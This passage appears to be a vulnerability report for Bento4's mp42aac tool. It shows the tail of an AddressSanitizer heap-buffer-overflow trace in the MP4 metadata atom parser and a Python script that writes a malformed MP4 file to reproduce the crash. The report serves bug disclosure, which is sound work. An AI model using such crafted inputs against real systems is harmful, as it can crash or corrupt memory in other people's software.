#4 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#5 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#6 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#7 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#8 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#9 0x626ae04ca119 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:419
#10 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#11 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#12 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#13 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#14 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#15 0x626ae04dda93 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
#16 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#17 0x626ae04dc261 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#18 0x626ae04913cd in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:104
#19 0x626ae0491946 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:78
#20 0x626ae048af8b in main /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#21 0x7da2ce22a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#22 0x7da2ce22a28a in __libc_start_main_impl ../csu/libc-start.c:360
#23 0x626ae048a844 in _start (/home/zhicheng/FuzzDriverGen/findreal/Bento4/build/mp42aac+0x2e844) (BuildId: 94ff24dd55ddc5b1351bd12a32fabe9570488544)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:996 in fread
Shadow bytes around the buggy address:
0x501ffffffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x501ffffffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x501fffffff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x501fffffff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x502000000000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
=>0x502000000080: fa fa 01 fa fa fa[01]fa fa fa fa fa fa fa fa fa
0x502000000100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000000300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8720==ABORTINGPoC
You can use the following python script to generate a PoC.
#!/usr/bin/env python3
"""
Generate a minimalist MP4‐style file that focuses on the metadata boxes.
The layout is:
[ ilst ] (size = 0 → claims the rest of the file)
└─[ ---- ] (size = 0)
├─[ mean ] – very small body
├─[ name ] – declared with an odd total length
└─[ data ] – comparatively large payload
Changing the numeric fields is an easy way to explore additional edge cases.
"""
import struct
def box(tag: bytes, payload: bytes) -> bytes:
"""Wrap a payload with a 32‑bit big‑endian size and four‑letter tag."""
return struct.pack(">I4s", 8 + len(payload), tag) + payload
def build(path: str = "meta_string_hbo.mp4") -> None:
buf = bytearray()
# Root metadata list. Size = 0 means “until EOF” for many parsers.
buf += struct.pack(">I4s", 0, b"ilst")
# Free‑form metadata key container.
buf += struct.pack(">I4s", 0, b"----")
# Tiny ‘mean’ atom: only version/flags (4 bytes) after the header.
buf += box(b"mean", b"\x00\x00\x00\x00")
# ‘name’ atom with a deliberately unusual total size (11 bytes).
# Body is three zero bytes → header (8) + body (3) = 11.
buf += struct.pack(">I4s", 11, b"name") + b"\x00\x00\x00"
# ‘data’ atom: type/locale field plus an oversized content blob.
data_body = b"\x00\x00\x01\x64" # standard 4‑byte header inside ‘data’
data_body += b"\x00" * 230 # exaggerated payload
data_body += b"xf" # simple marker at the end
buf += box(b"data", data_body)
with open(path, "wb") as f:
f.write(buf)
print(f"PoC written to {path} ({len(buf)} bytes)")
if __name__ == "__main__":
build()You also can download the folloing PoC to reproduce this bug.
meta_string_hbo.mp4